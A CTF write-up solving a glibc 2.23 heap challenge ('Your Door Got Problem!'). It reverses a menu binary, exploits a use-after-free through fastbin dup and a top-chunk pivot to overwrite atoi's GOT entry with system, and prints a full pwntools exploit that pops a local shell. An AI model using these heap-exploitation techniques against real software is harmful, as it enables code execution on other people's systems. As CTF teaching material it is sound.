CTF.SG pwn challenge

2021-04-17

Interesting heap challenge named ‘Your Door Got Problem!’

Environment Setup

OS: Parrot Security VM
Tools: pwndbg, pwntools, python3

I did not participate in the challenge, so all I got was the files and this image hinting about heap fengshui.

The given libc version is 2.23, means no tcache and lack of many exploit mitigations such as top chunk size sanity check.

$ ./libc.so.6 
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11.2) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 5.4.0 20160609.
Available extensions:
	crypt add-on version 2.1 by Michael Glad and others
	GNU Libidn by Simon Josefsson
	Native POSIX Threads Library by Ulrich Drepper et al
	BIND-8.2.3-T5B
libc ABIs: UNIQUE IFUNC
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

The binary has no PIE and only partial RELRO, meaning that the GOT can be targeted.

$ checksec master_wang
[*] '/home/chief/Desktop/pwn/randompwns/master_wang/master_wang'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Let’s first use patchelf to link the binary to the target libc.

1
2
3

$ cp master_wang master_wang_2.23
$ patchelf --set-interpreter ./ld.so master_wang_2.23
$ patchelf --replace-needed libc.so.6 ./libc.so.6 master_wang_2.23

Now master_wang_2.23 is linked against the target libc, and we can start reversing it.

Reverse Engineering

Open the binary in IDA and decompile it.
The binary is not stripped, so reversing is easy.

main:

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setup_IO(argc, argv, envp);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      printf("Choice => ");
      fgets(s, 15, stdin);
      v3 = atoi(s);
      if ( v3 != 2 )
        break;
      view_huatfriend();
    }
    if ( v3 > 2 )
    {
      if ( v3 == 3 )
      {
        disown_huatfriend();
      }
      else if ( v3 == 4 )
      {
        exit(0);
      }
    }
    else if ( v3 == 1 )
    {
      manipulate_fengshui();
    }
  }
}

Seems like a typical menu challenge

view:

unsigned __int64 view_huatfriend()
{
  int v1; // [rsp+Ch] [rbp-24h]
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("\nEnter HuatFriend ID => ");
  fgets(s, 15, stdin);
  v1 = atoi(s);
  if ( v1 < total_changes )
    printf("HuatFriend Data: %s\n", (&fengshui)[v1]);
  else
    puts("\nYou don't have that HuatFriend!");
  return __readfsqword(0x28u) ^ v3;
}

disown:

unsigned __int64 disown_huatfriend()
{
  int v1; // [rsp+Ch] [rbp-24h]
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("\nEnter HuatFriend ID => ");
  fgets(s, 15, stdin);
  v1 = atoi(s);
  if ( v1 < total_changes )
  {
    free((&fengshui)[v1]);
    printf("\nYou have disowned HuatFriend #%d.\n", (unsigned int)v1);
  }
  else
  {
    puts("\nYou don't have that HuatFriend!");
  }
  return __readfsqword(0x28u) ^ v3;
}

manipulate:

unsigned __int64 manipulate_fengshui()
{
  int v0; // ebx
  int v1; // eax
  int n; // [rsp+4h] [rbp-3Ch]
  int na; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char s[24]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+28h] [rbp-18h]

  v7 = __readfsqword(0x28u);
  puts("\nChange the angle of your door to alter your Fengshui!");
  printf("Enter New Angle (degrees) => ");
  fgets(s, 15, stdin);
  n = atoi(s);
  if ( n <= 90 )
  {
    if ( n > 19 )
    {
      if ( n % 10 || ((n / 10) & 1) != 0 )
      {
        puts("\nMaster Wang: Haiya! NO NO NO! This angle inauspicious!");
        puts("Note: an angle is auspicious when it is a multiple of 10 and contains only even digits.");
      }
      else
      {
        printf("\nSetting door to %d degrees...\n", (unsigned int)n);
        if ( total_changes > 15 )
        {
          puts("Moments after you grabbed the door handle, you hear a crack.");
          puts("Oops... Seems like you changed the door angle one too many times.");
          puts("The door hinge snaps, and the entire door falls on you.");
          puts("You instantly perish.\n");
          puts("Master Wang: Alamak! Tell you already what. Your door really got problem...");
          exit(0);
        }
        na = 16 * (n / 10 - 1) + 8;
        puts("Successfully changed door angle!");
        v0 = total_changes;
        (&fengshui)[v0] = (char *)malloc(na);
        puts("Congrats on manipulating your Fengshui!");
        puts("\nYou should probably yell out an auspicious phrase to commemorate this.");
        printf("Enter Auspicious Phrase => ");
        fgets((&fengshui)[total_changes], na, stdin);
        v1 = total_changes++;
        v5 = (&fengshui)[v1];
        v5[strcspn(v5, "\n")] = 0;
        puts("\nEnjoy your new Fengshui! Here's a free HuatFriend!");
        printf("Obtained HuatFriend ID #%d.\n", (unsigned int)(total_changes - 1));
      }
    }
    else
    {
      puts("\nMaster Wang: Oi! Door open so small, how the luck come in???");
    }
  }

It’s good practise to rename variables when reversing. I did not do it because im lazy :p
Anyways now we have some insights into how the binary works.

We can malloc, read and free chunks with manipulate(), view() and disown() respectively
We can only malloc chunks of size 0x20, 0x40, 0x60 and 0x80
Data passed to chunk cannot be modified after input
Menu selection input is passed through atoi()
Maximum of 16 allocations possible
First occurence of the newline character will be substituted by a null byte
view() calls printf(), so output stops at a null byte
global variable total_changes stores the number of allocations
global array fengshui stores pointers to chunk userdata
fengshui is not updated after chunk is freed, so we have UAF!!

With these information there are many things we can do.

I tried various methods to exploit such as overwriting fengshui or total_changes, but all failed because the manipulate() function reads a newline…
Hence I’ll only be documenting the successful exploit strategy I used below.

Exploitation

General Strategy:

UAF to leak heap base
heap fengshui to forge a chunk in unsortedbin, read fd(forward pointer) to leak libc base
forge fake size field in main_arena with fastbin dup
link fake chunk into main_arena by poisoning fastbin
modify top chunk pointer to just before malloc_hook/GOT entry of atoi()
request a chunk that is serviced by the top chunk, overwrite malloc_hook with one_gadget/atoi() with system

I wrote a python script that wraps around the menu functions, so it’s easier to read the code.

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF('master_wang_2.23')
libc = elf.libc

def start():
    if args.GDB:
        context(terminal=['tmux', 'new-window'])
        return gdb.debug(elf.path)
    else:
        return process(elf.path)

p = start()
index = 0

def malloc(size, data):
    global index
    p.sendlineafter('=> ', '1')
    p.sendlineafter('=> ', str(size))
    p.sendlineafter('=> ', data)
    index += 1
    return index-1

def free(index):
    p.sendlineafter('=> ', '3')
    p.sendlineafter('=> ', str(index))
    return

def read(index):
    p.sendlineafter('=> ', '2')
    p.sendlineafter('=> ', str(index))
    p.recvuntil('Data: ')
    return p.recvline()

First step will be to leak the heap base address, so we can forge overlapping chunks.
We request two 0x80 size chunks, then free them into the 0x80 fastbin.
The first quadword of chunk_A's userdata now contains a pointer to chunk_B, which we can read and leak the heap base address.
We also write a fake size field just before chunk_B, so we can link that fake chunk into the 0x80 fastbin in the next step.

#UAF leak heap
chunk_A = malloc(80, b'A'*0x68 + p64(0x81) + p64(0))
chunk_B = malloc(80, 'BBBB')
free(chunk_B)
free(chunk_A)
heap_leak = read(chunk_A).strip()
heap = u64(heap_leak.ljust(8, b'\x00'))-0x80
log.success('Heap Base: ' + hex(heap))

heap:

pwndbg> dq 0x603000 20
0000000000603000     0000000000000000 0000000000000081
0000000000603010     0000000000603080 4141414141414141   <-- fd pointing to chunk B
0000000000603020     4141414141414141 4141414141414141
0000000000603030     4141414141414141 4141414141414141
0000000000603040     4141414141414141 4141414141414141
0000000000603050     4141414141414141 4141414141414141
0000000000603060     4141414141414141 4141414141414141
0000000000603070     4141414141414141 0000000000000081
0000000000603080     0000000000000000 0000000000000081
0000000000603090     0000000000000000 0000000000000000

It is essential that we free chunk_B first, if not we will end up with a fd in chunk_B pointing to chunk_A, whose address ends in a null byte.
However, we will not be able to leak that fd, because printf() terminates at a null byte.

Next we can do some heap fengshui to get a chunk in the unsortedbin.

#heap fengshui get unsortedbin chunk
free(chunk_B)
chunk_B = malloc(80, p64(heap+0x70))
chunk_A = malloc(80, 'A')
overlap_B = malloc(80, 'BBBB')
modify_B = malloc(80, b'B'*8 + p64(0xc1))
bypass = malloc(80, b'B'*0x38 + p64(0x41))
free(chunk_B)
libc_leak = read(overlap_B).strip()
libc.address = u64(libc_leak.ljust(8, b'\x00'))-0x3c4b78
log.success('Libc Base: ' + hex(libc.address))

Here we free chunk_B again, essentially performing a fastbin dup attack to link the fake chunk we have set up previously into the 0x80 fastbin.
Next we use the fake chunk to overwrite chunk_B's size to 0xc1, and set up another chunk after it to satisfy the consolidation check when we free normal chunks.
Note that the size 0xc0 is crucial, because it allows us to remainder the freed chunk into two 0x60 chunks exactly, so there are no free chunks left on the heap that interferes with future requests.
Finally we free chunk_B and read its fd to obtain a pointer into the main_arena, a libc symbol.

heap before free:

pwndbg> dq 0x603000 50
0000000000603000     0000000000000000 0000000000000081
0000000000603010     0000000000000041 4141414141414141
0000000000603020     4141414141414141 4141414141414141
0000000000603030     4141414141414141 4141414141414141
0000000000603040     4141414141414141 4141414141414141
0000000000603050     4141414141414141 4141414141414141
0000000000603060     4141414141414141 4141414141414141
0000000000603070     4141414141414141 0000000000000081   <-- fake chunk
0000000000603080     4242424242424242 00000000000000c1   <-- overwritten chunk B size
0000000000603090     000000004242000a 000000000000000a
00000000006030a0     0000000000000000 0000000000000000
00000000006030b0     0000000000000000 0000000000000000
00000000006030c0     0000000000000000 0000000000000000
00000000006030d0     0000000000000000 0000000000000000
00000000006030e0     0000000000000000 0000000000000000
00000000006030f0     0000000000000000 0000000000000000
0000000000603100     0000000000000000 0000000000000081
0000000000603110     4242424242424242 4242424242424242
0000000000603120     4242424242424242 4242424242424242
0000000000603130     4242424242424242 4242424242424242
0000000000603140     4242424242424242 0000000000000041
0000000000603150     000000000000000a 0000000000000000
0000000000603160     0000000000000000 0000000000000000
0000000000603170     0000000000000000 0000000000000000
0000000000603180     0000000000000000 0000000000020e81

heap after free:

pwndbg> dq 0x603000 50
0000000000603000     0000000000000000 0000000000000081
0000000000603010     0000000000000041 4141414141414141
0000000000603020     4141414141414141 4141414141414141
0000000000603030     4141414141414141 4141414141414141
0000000000603040     4141414141414141 4141414141414141
0000000000603050     4141414141414141 4141414141414141
0000000000603060     4141414141414141 4141414141414141
0000000000603070     4141414141414141 0000000000000081   <-- fake chunk
0000000000603080     4242424242424242 00000000000000c1
0000000000603090     00007ffff7dd1b78 00007ffff7dd1b78   <-- unsortedbin fd and bk
00000000006030a0     0000000000000000 0000000000000000
00000000006030b0     0000000000000000 0000000000000000
00000000006030c0     0000000000000000 0000000000000000
00000000006030d0     0000000000000000 0000000000000000
00000000006030e0     0000000000000000 0000000000000000
00000000006030f0     0000000000000000 0000000000000000
0000000000603100     0000000000000000 0000000000000081
0000000000603110     4242424242424242 4242424242424242
0000000000603120     4242424242424242 4242424242424242
0000000000603130     4242424242424242 4242424242424242
0000000000603140     00000000000000c0 0000000000000040
0000000000603150     000000000000000a 0000000000000000
0000000000603160     0000000000000000 0000000000000000
0000000000603170     0000000000000000 0000000000000000
0000000000603180     0000000000000000 0000000000020e81

With a libc and heap leak, we can start causing real damage.

First we free the last 0x80 chunk, because we will use it to poison the 0x80 fastbin.
Then we remainder the unsortedbin free chunk into two 0x60 chunks, and double free one of them.
In the process we overwrite the fd of the freed 0x60 chunk to 0x81.
This address does not have to be valid because we are merely using it to forge a sane size field.
Finally we call malloc three times so that the 0x60 fastbin fd in the main_arena holds the value 0x81.
At the same time we populate the fd of the freed 0x80 chunk with the address pointing to the 0x50 fastbin fd in the main_arena, so we can use the 0x60 fd as a size field for a fake chunk inside of the main_arena.

#remainder unsorted chunk and write 0x81 size field to main arena
#also poison 0x80 fastbins
free(bypass)
fake_addr = libc.address + 0x3c4b40
chunk_C = malloc(60, 'C')
chunk_D = malloc(60, 'D')
free(chunk_C)
free(chunk_D)
free(chunk_C)
malloc(60, p64(0x81))
malloc(60, p64(0)*3 + p64(0x81) + p64(fake_addr))
malloc(60, 'M')

heap:

pwndbg> dq 0x603000 50
0000000000603000     0000000000000000 0000000000000081
0000000000603010     0000000000000041 4141414141414141
0000000000603020     4141414141414141 4141414141414141
0000000000603030     4141414141414141 4141414141414141
0000000000603040     4141414141414141 4141414141414141
0000000000603050     4141414141414141 4141414141414141
0000000000603060     4141414141414141 4141414141414141
0000000000603070     4141414141414141 0000000000000081
0000000000603080     4242424242424242 0000000000000061   <-- chunk C
0000000000603090     000000000000004d 00007ffff7dd000a
00000000006030a0     0000000000000000 0000000000000000
00000000006030b0     0000000000000000 0000000000000000
00000000006030c0     0000000000000000 0000000000000000
00000000006030d0     0000000000000000 0000000000000000
00000000006030e0     0000000000000000 0000000000000061   <-- chunk D
00000000006030f0     0000000000000000 0000000000000000
0000000000603100     0000000000000000 0000000000000081
0000000000603110     00007ffff7dd1b40 424242424242000a   <-- overwritten fd 
0000000000603120     4242424242424242 4242424242424242
0000000000603130     4242424242424242 4242424242424242
0000000000603140     0000000000000060 0000000000000041
0000000000603150     000000000000000a 0000000000000000
0000000000603160     0000000000000000 0000000000000000
0000000000603170     0000000000000000 0000000000000000
0000000000603180     0000000000000000 0000000000020e81

main_arena:

pwndbg> dq 0x7ffff7dd1b10 40
00007ffff7dd1b10     0000000000000000 0000000000000000
00007ffff7dd1b20     0000000000000000 0000000000000000
00007ffff7dd1b30     0000000000000000 0000000000000000
00007ffff7dd1b40     0000000000000000 0000000000000081   <-- fake size field
00007ffff7dd1b50     0000000000000000 0000000000603100   <-- 0x80 fastbin fd
00007ffff7dd1b60     0000000000000000 0000000000000000
00007ffff7dd1b70     0000000000000000 0000000000603180   <-- top chunk pointer
00007ffff7dd1b80     00000000006030e0 00007ffff7dd1b78
00007ffff7dd1b90     00007ffff7dd1b78 00007ffff7dd1b88

From here it’s easy.
We request the fake chunk in main_arena and overwrite the top chunk pointer with a location of our choosing.
free_hook is out of scope, because the top chunk’s size cannot be null and there are no naturally occuring data near the free_hook.
Other hooks of malloc can be hard to trigger, so it’s wise to target the malloc_hook.
However, none of the one_gadgets actually work in this case… so our next best target will be the GOT entry of atoi().

GOT:

pwndbg> x/40gx 0x602000
0x602000:                               0x0000000000601e28      0x00007ffff7ffe168
0x602010:                               0x00007ffff7deef10      0x00007ffff7a91540
0x602020 <puts@got.plt>:                0x00007ffff7a7c6a0      0x00000000004006b6
0x602030 <printf@got.plt>:              0x00007ffff7a62810      0x00007ffff7b576b0
0x602040 <__libc_start_main@got.plt>:   0x00007ffff7a2d750      0x00007ffff7a7aae0
0x602050 <malloc@got.plt>:              0x00007ffff7a91180      0x00007ffff7a7ce80   <-- point top chunk here
0x602060 <atoi@got.plt>:                0x00007ffff7a43e90      0x0000000000400736
0x602070:                               0x0000000000000000      0x0000000000000000   <-- top chunk size after our request
0x602080 <stdout@@GLIBC_2.2.5>:         0x00007ffff7dd2620      0x0000000000000000
0x602090 <stdin@@GLIBC_2.2.5>:          0x00007ffff7dd18e0      0x0000000c00000000
0x6020a0 <fengshui>:                    0x0000000000603010      0x0000000000603090

Disassembling the data segment shows that there are two quadwords of padding null bytes before the bss segment, which is great for us.
This means when we request a chunk from the pivoted top chunk, the new top chunk size field will not overwrite any sensitive data and cause a segfault.

So let’s do that in the exploit script.

#link chunk into main arena and overwrite top chunk pointer
#overwrite atoi GOT with system
malloc(80, 'A')
unsortedhead = libc.address+0x3c4b78
malloc(80, p64(0)*5 + p64(elf.got.exit-0x18) + p64(0) + p64(unsortedhead)*2 + p64(unsortedhead+0x10)*2\
        + p64(unsortedhead+0x20)*2 + p64(unsortedhead+0x30)*2) #dont write newline into smallbin headers
malloc(20, p64(libc.sym.system))

I wrote exactly 0x78 bytes of data so that the binary does not write the newline character into the main_arena and cause segfaults.
Then a call to malloc allows us to overwrite the GOT entry of atoi() to system.

GOT:

pwndbg> x/40gx 0x602000
0x602000:                               0x0000000000601e28      0x00007ffff7ffe168
0x602010:                               0x00007ffff7deef10      0x00007ffff7a91540
0x602020 <puts@got.plt>:                0x00007ffff7a7c6a0      0x00000000004006b6
0x602030 <printf@got.plt>:              0x00007ffff7a62810      0x00007ffff7b576b0
0x602040 <__libc_start_main@got.plt>:   0x00007ffff7a2d750      0x00007ffff7a7aae0
0x602050 <malloc@got.plt>:              0x00007ffff7a91180      0x0000000000000021   <-- request serviced by top chunk
0x602060 <atoi@got.plt>:                0x00007ffff7a523a0      0x000000000040000a   <-- overwritten with address of system
0x602070:                               0x0000000000000000      0x00007ffff7a7ce61   <-- new top chunk size
0x602080 <stdout@@GLIBC_2.2.5>:         0x00007ffff7dd2620      0x0000000000000000
0x602090 <stdin@@GLIBC_2.2.5>:          0x00007ffff7dd18e0      0x0000000c00000000
0x6020a0 <fengshui>:                    0x0000000000603010      0x0000000000603090

In the process we overwrote the GOT entry of exit with a newline, but it still points to executable memory so that’s fine.

Now any calls to atoi() will be a call to system, and we can use the menu as a shell.

 __       __                        __                            __       __                                                                           
/  \     /  |                      /  |                          /  |  _  /  |                                                                                                                
$$  \   /$$ |  ______    _______  _$$ |_     ______    ______    $$ | / \ $$ |  ______   _______    ______   
$$$  \ /$$$ | /      \  /       |/ $$   |   /      \  /      \   $$ |/$  \$$ | /      \ /       \  /      \
$$$$  /$$$$ | $$$$$$  |/$$$$$$$/ $$$$$$/   /$$$$$$  |/$$$$$$  |  $$ /$$$  $$ | $$$$$$  |$$$$$$$  |/$$$$$$  | 
$$ $$ $$/$$ | /    $$ |$$      \   $$ | __ $$    $$ |$$ |  $$/   $$ $$/$$ $$ | /    $$ |$$ |  $$ |$$ |  $$ |                                                                                
$$ |$$$/ $$ |/$$$$$$$ | $$$$$$  |  $$ |/  |$$$$$$$$/ $$ |        $$$$/  $$$$ |/$$$$$$$ |$$ |  $$ |$$ \__$$ | 
$$ | $/  $$ |$$    $$ |/     $$/   $$  $$/ $$       |$$ |        $$$/    $$$ |$$    $$ |$$ |  $$ |$$    $$ | 
$$/      $$/  $$$$$$$/ $$$$$$$/     $$$$/   $$$$$$$/ $$/         $$/      $$/  $$$$$$$/ $$/   $$/  $$$$$$$ | 
                                                                                                  /  \__$$ | 
                                                                                                  $$    $$/ 
                                                                                                   $$$$$$/   
                     
==============================================================================================================
|       Your door got problem! A very big Fengshui problem! But have no fear, as Master Wang is here!        |
==============================================================================================================
| 1) Manipulate Door Fengshui                                                                                |
| 2) View HuatFriend                                                                                         |
| 3) Disown HuatFriend                                                                                       |
| 4) Quit                                                                                                    |
==============================================================================================================
                                                                
Choice => $ whoami && id                                
chief
uid=1000(chief) gid=1000(chief) groups=1000(chief)

complete exploit script:

#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF('master_wang_2.23')
libc = elf.libc

def start():
    if args.GDB:
        context(terminal=['tmux', 'new-window'])
        return gdb.debug(elf.path)
    else:
        return process(elf.path)

p = start()
index = 0

def malloc(size, data):
    global index
    p.sendlineafter('=> ', '1')
    p.sendlineafter('=> ', str(size))
    p.sendlineafter('=> ', data)
    index += 1
    return index-1

def free(index):
    p.sendlineafter('=> ', '3')
    p.sendlineafter('=> ', str(index))
    return

def read(index):
    p.sendlineafter('=> ', '2')
    p.sendlineafter('=> ', str(index))
    p.recvuntil('Data: ')
    return p.recvline()

#UAF leak heap
chunk_A = malloc(80, b'A'*0x68 + p64(0x81) + p64(0))
chunk_B = malloc(80, 'BBBB')
free(chunk_B)
free(chunk_A)
heap_leak = read(chunk_A).strip()
heap = u64(heap_leak.ljust(8, b'\x00'))-0x80
log.success('Heap Base: ' + hex(heap))

#heap fengshui get unsortedbin chunk
free(chunk_B)
chunk_B = malloc(80, p64(heap+0x70))
chunk_A = malloc(80, 'A')
overlap_B = malloc(80, 'BBBB')
modify_B = malloc(80, b'B'*8 + p64(0xc1))
bypass = malloc(80, b'B'*0x38 + p64(0x41))
free(chunk_B)
libc_leak = read(overlap_B).strip()
libc.address = u64(libc_leak.ljust(8, b'\x00'))-0x3c4b78
log.success('Libc Base: ' + hex(libc.address))

#remainder unsorted chunk and write 0x81 size field to main arena
#also poison 0x80 fastbins
free(bypass)
fake_addr = libc.address + 0x3c4b40
chunk_C = malloc(60, 'C')
chunk_D = malloc(60, 'D')
free(chunk_C)
free(chunk_D)
free(chunk_C)
malloc(60, p64(0x81))
malloc(60, p64(0)*3 + p64(0x81) + p64(fake_addr))
malloc(60, 'M')

#link chunk into main arena and overwrite top chunk pointer
#overwrite atoi GOT with system
malloc(80, 'A')
unsortedhead = libc.address+0x3c4b78
malloc(80, p64(0)*5 + p64(elf.got.exit-0x18) + p64(0) + p64(unsortedhead)*2 + p64(unsortedhead+0x10)*2\
        + p64(unsortedhead+0x20)*2 + p64(unsortedhead+0x30)*2) #dont write newline into smallbin headers

malloc(20, p64(libc.sym.system))

#getshell
p.recvuntil('=> ')
p.sendline(b'/bin/sh\x00')

p.interactive()

Conclusion

Interesting challenge with lots of restrictions…
Many exploit ideas failed due to the binary reading a newline, got to say that was pretty annoying.
Nevertheless it forced me to persevere and be a bit more creative in order to feast on the dopamine rush from popping a shell ;)

ps: i think it can be solved by house of orange, but im too lazy to try it. please tell me if it works!

goodbye